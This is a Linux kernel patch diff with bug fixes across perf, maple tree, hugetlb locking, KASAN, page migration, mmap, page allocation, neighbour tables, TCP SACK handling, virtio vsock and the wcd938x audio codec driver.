+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -13293,7 +13293,8 @@ static int inherit_group(struct perf_event *parent_event,
+ 		    !perf_get_aux_event(child_ctr, leader))
+ 			return -EINVAL;
+ 	}
+-	leader->group_generation = parent_event->group_generation;
++	if (leader)
++		leader->group_generation = parent_event->group_generation;
+ 	return 0;
+ }
+ 
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index 22852029c6924..56675294d7a3b 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -989,7 +989,7 @@ EXPORT_SYMBOL_GPL(kprobe_event_cmd_init);
+  * @name: The name of the kprobe event
+  * @loc: The location of the kprobe event
+  * @kretprobe: Is this a return probe?
+- * @args: Variable number of arg (pairs), one pair for each field
++ * @...: Variable number of arg (pairs), one pair for each field
+  *
+  * NOTE: Users normally won't want to call this function directly, but
+  * rather use the kprobe_event_gen_cmd_start() wrapper, which automatically
+@@ -1062,7 +1062,7 @@ EXPORT_SYMBOL_GPL(__kprobe_event_gen_cmd_start);
+ /**
+  * __kprobe_event_add_fields - Add probe fields to a kprobe command from arg list
+  * @cmd: A pointer to the dynevent_cmd struct representing the new event
+- * @args: Variable number of arg (pairs), one pair for each field
++ * @...: Variable number of arg (pairs), one pair for each field
+  *
+  * NOTE: Users normally won't want to call this function directly, but
+  * rather use the kprobe_event_add_fields() wrapper, which
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 250b4c67fac8f..4976522e3e481 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5913,7 +5913,7 @@ int mas_expected_entries(struct ma_state *mas, unsigned long nr_entries)
+ 	/* Internal nodes */
+ 	nr_nodes += DIV_ROUND_UP(nr_nodes, nonleaf_cap);
+ 	/* Add working room for split (2 nodes) + new parents */
+-	mas_node_count(mas, nr_nodes + 3);
++	mas_node_count_gfp(mas, nr_nodes + 3, GFP_KERNEL);
+ 
+ 	/* Detect if allocations run out */
+ 	mas->mas_flags |= MA_STATE_PREALLOC;
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index fad668042f3e7..ab9d4461abc9d 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -9,6 +9,7 @@
+ 
+ #include <linux/maple_tree.h>
+ #include <linux/module.h>
++#include <linux/rwsem.h>
+ 
+ #define MTREE_ALLOC_MAX 0x2000000000000Ul
+ #ifndef CONFIG_DEBUG_MAPLE_TREE
+@@ -1678,17 +1679,21 @@ static noinline void __init check_forking(struct maple_tree *mt)
+ 	void *val;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	MA_STATE(newmas, mt, 0, 0);
++	struct rw_semaphore newmt_lock;
++
++	init_rwsem(&newmt_lock);
+ 
+ 	for (i = 0; i <= nr_entries; i++)
+ 		mtree_store_range(mt, i*10, i*10 + 5,
+ 				  xa_mk_value(i), GFP_KERNEL);
+ 
+ 	mt_set_non_kernel(99999);
+-	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE);
++	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN);
++	mt_set_external_lock(&newmt, &newmt_lock);
+ 	newmas.tree = &newmt;
+ 	mas_reset(&newmas);
+ 	mas_reset(&mas);
+-	mas_lock(&newmas);
++	down_write(&newmt_lock);
+ 	mas.index = 0;
+ 	mas.last = 0;
+ 	if (mas_expected_entries(&newmas, nr_entries)) {
+@@ -1703,10 +1708,10 @@ static noinline void __init check_forking(struct maple_tree *mt)
+ 	}
+ 	rcu_read_unlock();
+ 	mas_destroy(&newmas);
+-	mas_unlock(&newmas);
+ 	mt_validate(&newmt);
+ 	mt_set_non_kernel(0);
+-	mtree_destroy(&newmt);
++	__mt_destroy(&newmt);
++	up_write(&newmt_lock);
+ }
+ 
+ static noinline void __init check_iteration(struct maple_tree *mt)
+@@ -1818,6 +1823,10 @@ static noinline void __init bench_forking(struct maple_tree *mt)
+ 	void *val;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	MA_STATE(newmas, mt, 0, 0);
++	struct rw_semaphore newmt_lock;
++
++	init_rwsem(&newmt_lock);
++	mt_set_external_lock(&newmt, &newmt_lock);
+ 
+ 	for (i = 0; i <= nr_entries; i++)
+ 		mtree_store_range(mt, i*10, i*10 + 5,
+@@ -1832,7 +1841,7 @@ static noinline void __init bench_forking(struct maple_tree *mt)
+ 		mas.index = 0;
+ 		mas.last = 0;
+ 		rcu_read_lock();
+-		mas_lock(&newmas);
++		down_write(&newmt_lock);
+ 		if (mas_expected_entries(&newmas, nr_entries)) {
+ 			printk("OOM!");
+ 			BUG_ON(1);
+@@ -1843,11 +1852,11 @@ static noinline void __init bench_forking(struct maple_tree *mt)
+ 			mas_store(&newmas, val);
+ 		}
+ 		mas_destroy(&newmas);
+-		mas_unlock(&newmas);
+ 		rcu_read_unlock();
+ 		mt_validate(&newmt);
+ 		mt_set_non_kernel(0);
+-		mtree_destroy(&newmt);
++		__mt_destroy(&newmt);
++		up_write(&newmt_lock);
+ 	}
+ }
+ #endif
+@@ -2453,6 +2462,10 @@ static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 	void *tmp;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	MA_STATE(newmas, &newmt, 0, 0);
++	struct rw_semaphore newmt_lock;
++
++	init_rwsem(&newmt_lock);
++	mt_set_external_lock(&newmt, &newmt_lock);
+ 
+ 	if (!zero_start)
+ 		i = 1;
+@@ -2462,9 +2475,9 @@ static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 		mtree_store_range(mt, i*10, (i+1)*10 - gap,
+ 				  xa_mk_value(i), GFP_KERNEL);
+ 
+-	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE);
++	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN);
+ 	mt_set_non_kernel(99999);
+-	mas_lock(&newmas);
++	down_write(&newmt_lock);
+ 	ret = mas_expected_entries(&newmas, nr_entries);
+ 	mt_set_non_kernel(0);
+ 	MT_BUG_ON(mt, ret != 0);
+@@ -2477,9 +2490,9 @@ static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 	}
+ 	rcu_read_unlock();
+ 	mas_destroy(&newmas);
+-	mas_unlock(&newmas);
+ 
+-	mtree_destroy(&newmt);
++	__mt_destroy(&newmt);
++	up_write(&newmt_lock);
+ }
+ 
+ /* Duplicate many sizes of trees.  Mainly to test expected entry values */
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index c38ec6efec0f7..aa4a68dfb3b92 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -96,6 +96,7 @@ static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma);
+ static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma);
+ static void hugetlb_unshare_pmds(struct vm_area_struct *vma,
+ 		unsigned long start, unsigned long end);
++static struct resv_map *vma_resv_map(struct vm_area_struct *vma);
+ 
+ static inline bool subpool_is_free(struct hugepage_subpool *spool)
+ {
+@@ -272,6 +273,10 @@ void hugetlb_vma_lock_read(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		down_read(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		down_read(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -281,6 +286,10 @@ void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		up_read(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		up_read(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -290,6 +299,10 @@ void hugetlb_vma_lock_write(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		down_write(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		down_write(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -299,17 +312,27 @@ void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		up_write(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		up_write(&resv_map->rw_sema);
+ 	}
+ }
+ 
+ int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
+ {
+-	struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+-	if (!__vma_shareable_lock(vma))
+-		return 1;
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+-	return down_write_trylock(&vma_lock->rw_sema);
++		return down_write_trylock(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		return down_write_trylock(&resv_map->rw_sema);
++	}
++
++	return 1;
+ }
+ 
+ void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+@@ -318,6 +341,10 @@ void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		lockdep_assert_held(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		lockdep_assert_held(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -350,6 +377,11 @@ static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		__hugetlb_vma_unlock_write_put(vma_lock);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		/* no free for anon vmas, but still need to unlock */
++		up_write(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -1068,6 +1100,7 @@ struct resv_map *resv_map_alloc(void)
+ 	kref_init(&resv_map->refs);
+ 	spin_lock_init(&resv_map->lock);
+ 	INIT_LIST_HEAD(&resv_map->regions);
++	init_rwsem(&resv_map->rw_sema);
+ 
+ 	resv_map->adds_in_progress = 0;
+ 	/*
+@@ -1138,8 +1171,7 @@ static void set_vma_resv_map(struct vm_area_struct *vma, struct resv_map *map)
+ 	VM_BUG_ON_VMA(!is_vm_hugetlb_page(vma), vma);
+ 	VM_BUG_ON_VMA(vma->vm_flags & VM_MAYSHARE, vma);
+ 
+-	set_vma_private_data(vma, (get_vma_private_data(vma) &
+-				HPAGE_RESV_MASK) | (unsigned long)map);
++	set_vma_private_data(vma, (unsigned long)map);
+ }
+ 
+ static void set_vma_resv_flags(struct vm_area_struct *vma, unsigned long flags)
+@@ -6898,8 +6930,10 @@ out_err:
+ 		 */
+ 		if (chg >= 0 && add < 0)
+ 			region_abort(resv_map, from, to, regions_needed);
+-	if (vma && is_vma_resv_set(vma, HPAGE_RESV_OWNER))
++	if (vma && is_vma_resv_set(vma, HPAGE_RESV_OWNER)) {
+ 		kref_put(&resv_map->refs, resv_map_release);
++		set_vma_resv_map(vma, NULL);
++	}
+ 	return false;
+ }
+ 
+diff --git a/mm/kasan/report.c b/mm/kasan/report.c
+index cc98dfdd3ed2f..66a37f177d231 100644
+--- a/mm/kasan/report.c
++++ b/mm/kasan/report.c
+@@ -523,9 +523,8 @@ void kasan_report_async(void)
+ }
+ #endif /* CONFIG_KASAN_HW_TAGS */
+ 
+-#ifdef CONFIG_KASAN_INLINE
+ /*
+- * With CONFIG_KASAN_INLINE, accesses to bogus pointers (outside the high
++ * With CONFIG_KASAN, accesses to bogus pointers (outside the high
+  * canonical half of the address space) cause out-of-bounds shadow memory reads
+  * before the actual access. For addresses in the low canonical half of the
+  * address space, as well as most non-canonical addresses, that out-of-bounds
+@@ -561,4 +560,3 @@ void kasan_non_canonical_hook(unsigned long addr)
+ 	pr_alert("KASAN: %s in range [0x%016lx-0x%016lx]\n", bug_type,
+ 		 orig_addr, orig_addr + KASAN_GRANULE_SIZE - 1);
+ }
+-#endif
+diff --git a/mm/migrate.c b/mm/migrate.c
+index 8d5c0dc618a57..9372a826e6d08 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -1787,6 +1787,7 @@ static int do_pages_move(struct mm_struct *mm, nodemask_t task_nodes,
+ 			 const int __user *nodes,
+ 			 int __user *status, int flags)
+ {
++	compat_uptr_t __user *compat_pages = (void __user *)pages;
+ 	int current_node = NUMA_NO_NODE;
+ 	LIST_HEAD(pagelist);
+ 	int start, i;
+@@ -1800,8 +1801,17 @@ static int do_pages_move(struct mm_struct *mm, nodemask_t task_nodes,
+ 		int node;
+ 
+ 		err = -EFAULT;
+-		if (get_user(p, pages + i))
+-			goto out_flush;
++		if (in_compat_syscall()) {
++			compat_uptr_t cp;
++
++			if (get_user(cp, compat_pages + i))
++				goto out_flush;
++
++			p = compat_ptr(cp);
++		} else {
++			if (get_user(p, pages + i))
++				goto out_flush;
++		}
+ 		if (get_user(node, nodes + i))
+ 			goto out_flush;
+ 		addr = (unsigned long)untagged_addr(p);
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 41a240bd81df8..8ffe3f87f7ba9 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -3147,13 +3147,13 @@ int vm_brk_flags(unsigned long addr, unsigned long request, unsigned long flags)
+ 	if (!len)
+ 		return 0;
+ 
+-	if (mmap_write_lock_killable(mm))
+-		return -EINTR;
+-
+ 	/* Until we need other flags, refuse anything except VM_EXEC. */
+ 	if ((flags & (~VM_EXEC)) != 0)
+ 		return -EINVAL;
+ 
++	if (mmap_write_lock_killable(mm))
++		return -EINTR;
++
+ 	ret = check_brk_limits(addr, len);
+ 	if (ret)
+ 		goto limits_failed;
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index ca017c6008b7c..4583f8a42d914 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -9638,6 +9638,7 @@ static void break_down_buddy_pages(struct zone *zone, struct page *page,
+ 			next_page = page;
+ 			current_buddy = page + size;
+ 		}
++		page = next_page;
+ 
+ 		if (set_page_guard(zone, current_buddy, high, migratetype))
+ 			continue;
+@@ -9645,7 +9646,6 @@ static void break_down_buddy_pages(struct zone *zone, struct page *page,
+ 		if (current_buddy != target) {
+ 			add_to_free_list(current_buddy, zone, high, migratetype);
+ 			set_buddy_order(current_buddy, high);
+-			page = next_page;
+ 		}
+ 	}
+ }
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index b20c9768d9f3f..41daa47d03934 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -251,7 +251,8 @@ bool neigh_remove_one(struct neighbour *ndel, struct neigh_table *tbl)
+ 
+ static int neigh_forced_gc(struct neigh_table *tbl)
+ {
+-	int max_clean = atomic_read(&tbl->gc_entries) - tbl->gc_thresh2;
++	int max_clean = atomic_read(&tbl->gc_entries) -
++			READ_ONCE(tbl->gc_thresh2);
+ 	unsigned long tref = jiffies - 5 * HZ;
+ 	struct neighbour *n, *tmp;
+ 	int shrunk = 0;
+@@ -280,7 +281,7 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 		}
+ 	}
+ 
+-	tbl->last_flush = jiffies;
++	WRITE_ONCE(tbl->last_flush, jiffies);
+ 
+ 	write_unlock_bh(&tbl->lock);
+ 
+@@ -464,17 +465,17 @@ static struct neighbour *neigh_alloc(struct neigh_table *tbl,
+ {
+ 	struct neighbour *n = NULL;
+ 	unsigned long now = jiffies;
+-	int entries;
++	int entries, gc_thresh3;
+ 
+ 	if (exempt_from_gc)
+ 		goto do_alloc;
+ 
+ 	entries = atomic_inc_return(&tbl->gc_entries) - 1;
+-	if (entries >= tbl->gc_thresh3 ||
+-	    (entries >= tbl->gc_thresh2 &&
+-	     time_after(now, tbl->last_flush + 5 * HZ))) {
+-		if (!neigh_forced_gc(tbl) &&
+-		    entries >= tbl->gc_thresh3) {
++	gc_thresh3 = READ_ONCE(tbl->gc_thresh3);
++	if (entries >= gc_thresh3 ||
++	    (entries >= READ_ONCE(tbl->gc_thresh2) &&
++	     time_after(now, READ_ONCE(tbl->last_flush) + 5 * HZ))) {
++		if (!neigh_forced_gc(tbl) && entries >= gc_thresh3) {
+ 			net_info_ratelimited("%s: neighbor table overflow!\n",
+ 					     tbl->id);
+ 			NEIGH_CACHE_STAT_INC(tbl, table_fulls);
+@@ -955,13 +956,14 @@ static void neigh_periodic_work(struct work_struct *work)
+ 
+ 	if (time_after(jiffies, tbl->last_rand + 300 * HZ)) {
+ 		struct neigh_parms *p;
+-		tbl->last_rand = jiffies;
++
++		WRITE_ONCE(tbl->last_rand, jiffies);
+ 		list_for_each_entry(p, &tbl->parms_list, list)
+ 			p->reachable_time =
+ 				neigh_rand_reach_time(NEIGH_VAR(p, BASE_REACHABLE_TIME));
+ 	}
+ 
+-	if (atomic_read(&tbl->entries) < tbl->gc_thresh1)
++	if (atomic_read(&tbl->entries) < READ_ONCE(tbl->gc_thresh1))
+ 		goto out;
+ 
+ 	for (i = 0 ; i < (1 << nht->hash_shift); i++) {
+@@ -2157,15 +2159,16 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 	ndtmsg->ndtm_pad2   = 0;
+ 
+ 	if (nla_put_string(skb, NDTA_NAME, tbl->id) ||
+-	    nla_put_msecs(skb, NDTA_GC_INTERVAL, tbl->gc_interval, NDTA_PAD) ||
+-	    nla_put_u32(skb, NDTA_THRESH1, tbl->gc_thresh1) ||
+-	    nla_put_u32(skb, NDTA_THRESH2, tbl->gc_thresh2) ||
+-	    nla_put_u32(skb, NDTA_THRESH3, tbl->gc_thresh3))
++	    nla_put_msecs(skb, NDTA_GC_INTERVAL, READ_ONCE(tbl->gc_interval),
++			  NDTA_PAD) ||
++	    nla_put_u32(skb, NDTA_THRESH1, READ_ONCE(tbl->gc_thresh1)) ||
++	    nla_put_u32(skb, NDTA_THRESH2, READ_ONCE(tbl->gc_thresh2)) ||
++	    nla_put_u32(skb, NDTA_THRESH3, READ_ONCE(tbl->gc_thresh3)))
+ 		goto nla_put_failure;
+ 	{
+ 		unsigned long now = jiffies;
+-		long flush_delta = now - tbl->last_flush;
+-		long rand_delta = now - tbl->last_rand;
++		long flush_delta = now - READ_ONCE(tbl->last_flush);
++		long rand_delta = now - READ_ONCE(tbl->last_rand);
+ 		struct neigh_hash_table *nht;
+ 		struct ndt_config ndc = {
+ 			.ndtc_key_len		= tbl->key_len,
+@@ -2173,7 +2176,7 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 			.ndtc_entries		= atomic_read(&tbl->entries),
+ 			.ndtc_last_flush	= jiffies_to_msecs(flush_delta),
+ 			.ndtc_last_rand		= jiffies_to_msecs(rand_delta),
+-			.ndtc_proxy_qlen	= tbl->proxy_queue.qlen,
++			.ndtc_proxy_qlen	= READ_ONCE(tbl->proxy_queue.qlen),
+ 		};
+ 
+ 		rcu_read_lock();
+@@ -2196,17 +2199,17 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 			struct neigh_statistics	*st;
+ 
+ 			st = per_cpu_ptr(tbl->stats, cpu);
+-			ndst.ndts_allocs		+= st->allocs;
+-			ndst.ndts_destroys		+= st->destroys;
+-			ndst.ndts_hash_grows		+= st->hash_grows;
+-			ndst.ndts_res_failed		+= st->res_failed;
+-			ndst.ndts_lookups		+= st->lookups;
+-			ndst.ndts_hits			+= st->hits;
+-			ndst.ndts_rcv_probes_mcast	+= st->rcv_probes_mcast;
+-			ndst.ndts_rcv_probes_ucast	+= st->rcv_probes_ucast;
+-			ndst.ndts_periodic_gc_runs	+= st->periodic_gc_runs;
+-			ndst.ndts_forced_gc_runs	+= st->forced_gc_runs;
+-			ndst.ndts_table_fulls		+= st->table_fulls;
++			ndst.ndts_allocs		+= READ_ONCE(st->allocs);
++			ndst.ndts_destroys		+= READ_ONCE(st->destroys);
++			ndst.ndts_hash_grows		+= READ_ONCE(st->hash_grows);
++			ndst.ndts_res_failed		+= READ_ONCE(st->res_failed);
++			ndst.ndts_lookups		+= READ_ONCE(st->lookups);
++			ndst.ndts_hits			+= READ_ONCE(st->hits);
++			ndst.ndts_rcv_probes_mcast	+= READ_ONCE(st->rcv_probes_mcast);
++			ndst.ndts_rcv_probes_ucast	+= READ_ONCE(st->rcv_probes_ucast);
++			ndst.ndts_periodic_gc_runs	+= READ_ONCE(st->periodic_gc_runs);
++			ndst.ndts_forced_gc_runs	+= READ_ONCE(st->forced_gc_runs);
++			ndst.ndts_table_fulls		+= READ_ONCE(st->table_fulls);
+ 		}
+ 
+ 		if (nla_put_64bit(skb, NDTA_STATS, sizeof(ndst), &ndst,
+@@ -2435,16 +2438,16 @@ static int neightbl_set(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 		goto errout_tbl_lock;
+ 
+ 	if (tb[NDTA_THRESH1])
+-		tbl->gc_thresh1 = nla_get_u32(tb[NDTA_THRESH1]);
++		WRITE_ONCE(tbl->gc_thresh1, nla_get_u32(tb[NDTA_THRESH1]));
+ 
+ 	if (tb[NDTA_THRESH2])
+-		tbl->gc_thresh2 = nla_get_u32(tb[NDTA_THRESH2]);
++		WRITE_ONCE(tbl->gc_thresh2, nla_get_u32(tb[NDTA_THRESH2]));
+ 
+ 	if (tb[NDTA_THRESH3])
+-		tbl->gc_thresh3 = nla_get_u32(tb[NDTA_THRESH3]);
++		WRITE_ONCE(tbl->gc_thresh3, nla_get_u32(tb[NDTA_THRESH3]));
+ 
+ 	if (tb[NDTA_GC_INTERVAL])
+-		tbl->gc_interval = nla_get_msecs(tb[NDTA_GC_INTERVAL]);
++		WRITE_ONCE(tbl->gc_interval, nla_get_msecs(tb[NDTA_GC_INTERVAL]));
+ 
+ 	err = 0;
+ 
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 068221e742425..d63942202493d 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -2202,16 +2202,17 @@ void tcp_enter_loss(struct sock *sk)
+  * restore sanity to the SACK scoreboard. If the apparent reneging
+  * persists until this RTO then we'll clear the SACK scoreboard.
+  */
+-static bool tcp_check_sack_reneging(struct sock *sk, int flag)
++static bool tcp_check_sack_reneging(struct sock *sk, int *ack_flag)
+ {
+-	if (flag & FLAG_SACK_RENEGING &&
+-	    flag & FLAG_SND_UNA_ADVANCED) {
++	if (*ack_flag & FLAG_SACK_RENEGING &&
++	    *ack_flag & FLAG_SND_UNA_ADVANCED) {
+ 		struct tcp_sock *tp = tcp_sk(sk);
+ 		unsigned long delay = max(usecs_to_jiffies(tp->srtt_us >> 4),
+ 					  msecs_to_jiffies(10));
+ 
+ 		inet_csk_reset_xmit_timer(sk, ICSK_TIME_RETRANS,
+ 					  delay, TCP_RTO_MAX);
++		*ack_flag &= ~FLAG_SET_XMIT_TIMER;
+ 		return true;
+ 	}
+ 	return false;
+@@ -2981,7 +2982,7 @@ static void tcp_fastretrans_alert(struct sock *sk, const u32 prior_snd_una,
+ 		tp->prior_ssthresh = 0;
+ 
+ 	/* B. In all the states check for reneging SACKs. */
+-	if (tcp_check_sack_reneging(sk, flag))
++	if (tcp_check_sack_reneging(sk, ack_flag))
+ 		return;
+ 
+ 	/* C. Check consistency of the current state. */
+diff --git a/net/vmw_vsock/virtio_transport.c b/net/vmw_vsock/virtio_transport.c
+index ad64f403536a9..460e7fbb42da3 100644
+--- a/net/vmw_vsock/virtio_transport.c
++++ b/net/vmw_vsock/virtio_transport.c
+@@ -590,6 +590,11 @@ static int virtio_vsock_vqs_init(struct virtio_vsock *vsock)
+ 
+ 	virtio_device_ready(vdev);
+ 
++	return 0;
++}
++
++static void virtio_vsock_vqs_start(struct virtio_vsock *vsock)
++{
+ 	mutex_lock(&vsock->tx_lock);
+ 	vsock->tx_run = true;
+ 	mutex_unlock(&vsock->tx_lock);
+@@ -604,7 +609,16 @@ static int virtio_vsock_vqs_init(struct virtio_vsock *vsock)
+ 	vsock->event_run = true;
+ 	mutex_unlock(&vsock->event_lock);
+ 
+-	return 0;
++	/* virtio_transport_send_pkt() can queue packets once
++	 * the_virtio_vsock is set, but they won't be processed until
++	 * vsock->tx_run is set to true. We queue vsock->send_pkt_work
++	 * when initialization finishes to send those packets queued
++	 * earlier.
++	 * We don't need to queue the other workers (rx, event) because
++	 * as long as we don't fill the queues with empty buffers, the
++	 * host can't send us any notification.
++	 */
++	queue_work(virtio_vsock_workqueue, &vsock->send_pkt_work);
+ }
+ 
+ static void virtio_vsock_vqs_del(struct virtio_vsock *vsock)
+@@ -707,6 +721,7 @@ static int virtio_vsock_probe(struct virtio_device *vdev)
+ 		goto out;
+ 
+ 	rcu_assign_pointer(the_virtio_vsock, vsock);
++	virtio_vsock_vqs_start(vsock);
+ 
+ 	mutex_unlock(&the_virtio_vsock_mutex);
+ 
+@@ -779,6 +794,7 @@ static int virtio_vsock_restore(struct virtio_device *vdev)
+ 		goto out;
+ 
+ 	rcu_assign_pointer(the_virtio_vsock, vsock);
++	virtio_vsock_vqs_start(vsock);
+ 
+ out:
+ 	mutex_unlock(&the_virtio_vsock_mutex);
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index c3964aa00b288..a2abd1a111612 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -3302,18 +3302,15 @@ static int wcd938x_populate_dt_data(struct wcd938x_priv *wcd938x, struct device
+ 	int ret;
+ 
+ 	wcd938x->reset_gpio = of_get_named_gpio(dev->of_node, "reset-gpios", 0);
+-	if (wcd938x->reset_gpio < 0) {
+-		dev_err(dev, "Failed to get reset gpio: err = %d\n",
+-			wcd938x->reset_gpio);
+-		return wcd938x->reset_gpio;
+-	}
++	if (wcd938x->reset_gpio < 0)
++		return dev_err_probe(dev, wcd938x->reset_gpio,
++				     "Failed to get reset gpio\n");
+ 
+ 	wcd938x->us_euro_gpio = devm_gpiod_get_optional(dev, "us-euro",
+ 						GPIOD_OUT_LOW);
+-	if (IS_ERR(wcd938x->us_euro_gpio)) {
+-		dev_err(dev, "us-euro swap Control GPIO not found\n");
+-		return PTR_ERR(wcd938x->us_euro_gpio);
+-	}
++	if (IS_ERR(wcd938x->us_euro_gpio))
++		return dev_err_probe(dev, PTR_ERR(wcd938x->us_euro_gpio),
++				     "us-euro swap Control GPIO not found\n");
+ 
+ 	cfg->swap_gnd_mic = wcd938x_swap_gnd_mic;
+ 
+@@ -3323,15 +3320,13 @@ static int wcd938x_populate_dt_data(struct wcd938x_priv *wcd938x, struct device
+ 	wcd938x->supplies[3].supply = "vdd-mic-bias";
+ 
+ 	ret = regulator_bulk_get(dev, WCD938X_MAX_SUPPLY, wcd938x->supplies);
+-	if (ret) {
+-		dev_err(dev, "Failed to get supplies: err = %d\n", ret);
+-		return ret;
+-	}
++	if (ret)
++		return dev_err_probe(dev, ret, "Failed to get supplies\n");
+ 
+ 	ret = regulator_bulk_enable(WCD938X_MAX_SUPPLY, wcd938x->supplies);
+ 	if (ret) {
+-		dev_err(dev, "Failed to enable supplies: err = %d\n", ret);
+-		return ret;
++		regulator_bulk_free(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++		return dev_err_probe(dev, ret, "Failed to enable supplies\n");
+ 	}
+ 
+ 	wcd938x_dt_parse_micbias_info(dev, wcd938x);
+@@ -3598,13 +3593,13 @@ static int wcd938x_probe(struct platform_device *pdev)
+ 
+ 	ret = wcd938x_add_slave_components(wcd938x, dev, &match);
+ 	if (ret)
+-		return ret;
++		goto err_disable_regulators;
+ 
+ 	wcd938x_reset(wcd938x);
+ 
+ 	ret = component_master_add_with_match(dev, &wcd938x_comp_ops, match);
+ 	if (ret)
+-		return ret;
++		goto err_disable_regulators;
+ 
+ 	pm_runtime_set_autosuspend_delay(dev, 1000);
+ 	pm_runtime_use_autosuspend(dev);
+@@ -3614,13 +3609,27 @@ static int wcd938x_probe(struct platform_device *pdev)
+ 	pm_runtime_idle(dev);
+ 
+ 	return 0;
++
++err_disable_regulators:
++	regulator_bulk_disable(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++	regulator_bulk_free(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++
++	return ret;
+ }
+ 
+-static int wcd938x_remove(struct platform_device *pdev)
++static void wcd938x_remove(struct platform_device *pdev)
+ {
+-	component_master_del(&pdev->dev, &wcd938x_comp_ops);
++	struct device *dev = &pdev->dev;
++	struct wcd938x_priv *wcd938x = dev_get_drvdata(dev);
+ 
+-	return 0;
++	component_master_del(dev, &wcd938x_comp_ops);
++
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_dont_use_autosuspend(dev);
++
++	regulator_bulk_disable(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++	regulator_bulk_free(WCD938X_MAX_SUPPLY, wcd938x->supplies);
+ }
+ 
+ #if defined(CONFIG_OF)
+@@ -3634,7 +3643,7 @@ MODULE_DEVICE_TABLE(of, wcd938x_dt_match);
+ 
+ static struct platform_driver wcd938x_codec_driver = {
+ 	.probe = wcd938x_probe,
+-	.remove = wcd938x_remove,
++	.remove_new = wcd938x_remove,
+ 	.driver = {
+ 		.name = "wcd938x_codec",
+ 		.of_match_table = of_match_ptr(wcd938x_dt_match),
